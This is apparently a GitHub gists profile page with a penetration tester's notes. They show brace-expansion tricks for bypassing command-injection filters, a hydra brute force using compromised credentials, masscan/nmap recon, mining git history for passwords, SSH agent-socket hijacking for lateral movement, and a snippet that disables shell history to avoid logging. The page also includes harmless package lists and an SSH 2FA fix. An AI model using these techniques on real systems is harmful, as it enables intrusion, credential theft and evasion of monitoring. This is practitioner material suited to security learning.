Skip to content

Instantly share code, notes, and snippets.

View int0x80's full-sized avatar
💭
Compiling code

int0x80

💭
Compiling code
View GitHub Profile
# From https://twitter.com/ryancdotorg/status/1479171257732112384
# Strict mode for bash
set -uo pipefail
trap 's=$?; echo ": Error on line "$LINENO": $BASH_COMMAND"; exit $s' ERR
IFS=$'\n\t'

This one blew my mind. An old trick applied in a new way: Shell brace expansion. Simplify your payloads and filter bypass for command execution. No need for spaces or input field separators.

$ file m.{exe,dll}
m.exe: PE32+ executable (console) x86-64, for MS Windows
m.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows

$ {which,-a,curl}
/usr/bin/curl
/bin/curl

Recently learned that hydra can use a list of credentials rather than specifying separate lists of usernames and passwords. Target your bruteforce first with credentials that you have already compromised.

$ hydra -C loot/creds 10.129.3.94 telnet
...
[23][telnet] host: 10.129.3.94   login: security   password: 4Cc3ssC0ntr0ller

$ tail -n 2 loot/creds
backup_admin:admin
security:4Cc3ssC0ntr0ller

Enrich and speed up your port scan recon by using masscan first to identify open ports. Then run service scans with nmap.

$ sudo masscan -p 1-65535,U:1-65535 ${IP} --rate 10000 -oL recon/masscan-${IP}
$ tcp=$(grep -F 'open tcp' recon/masscan-${IP} | awk '{print $3}' | tr '\n' ',' | sed "s/,$//")
$ udp=$(grep -F 'open udp' recon/masscan-${IP} | awk '{print $3}' | tr '\n' ',' | sed "s/,$//")
$ [ -n ${tcp} ] && sudo nmap -n -A -p ${tcp} ${IP} -oA recon/tcp-${IP} &
$ [ -n ${udp} ] && sudo nmap -n -sU -A -p ${udp} ${IP} -oA recon/udp-${IP} &

Finding creds in git repos is awesome.

$ for commit in $(seq 1 $(git reflog | wc -l)); do git diff HEAD@{$commit} 2>/dev/null | grep password; done
-spring.datasource.password=g!'301T%y%xT@uL`
+spring.datasource.password=4AT&G;[H@&'\^uDK
-spring.datasource.password=UmAnR=-v|{2=gyx?
+spring.datasource.password=4AT&G;[H@&'\^uDK
...

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld
@int0x80
int0x80 / digitalocean-vm-packages
Created November 23, 2018 16:23
Packages in a DigitalOcean Debian droplet after quick pruning
acl
adduser
apt
apt-utils
base-files
base-passwd
bash
bash-completion
bsdmainutils
bsdutils
@int0x80
int0x80 / minimal-vm-packages
Last active November 23, 2018 16:24
Packages in Debian VM after initial install
adduser
apt
apt-utils
base-files
base-passwd
bash
bsdmainutils
bsdutils
busybox
console-setup
@int0x80
int0x80 / ssh-2fa-fix.md
Last active April 14, 2017 20:15
Fixing OpenSSH + Google Authenticator on Debian

Recently I was unable to SSH into a host where 2FA was setup via Google Authenticator. The error message looked something like this:

$ ssh someuser@some.host.foo
someuser@some.host.foo's password:
Permission denied, please try again.

No entries were made in auth.log, and nothing had changed on the system aside from doing a dist-upgrade. Thanks to DigitalOcean, I determined one update was needed in /etc/ssh/sshd_config.

@int0x80
int0x80 / nohist.sh
Created November 19, 2016 23:54
Prevent history
unset HISTFILE
export HISTSIZE=0
export HISTFILESIZE=0
unset HISTSAVE
unset HISTLOG
unset WATCH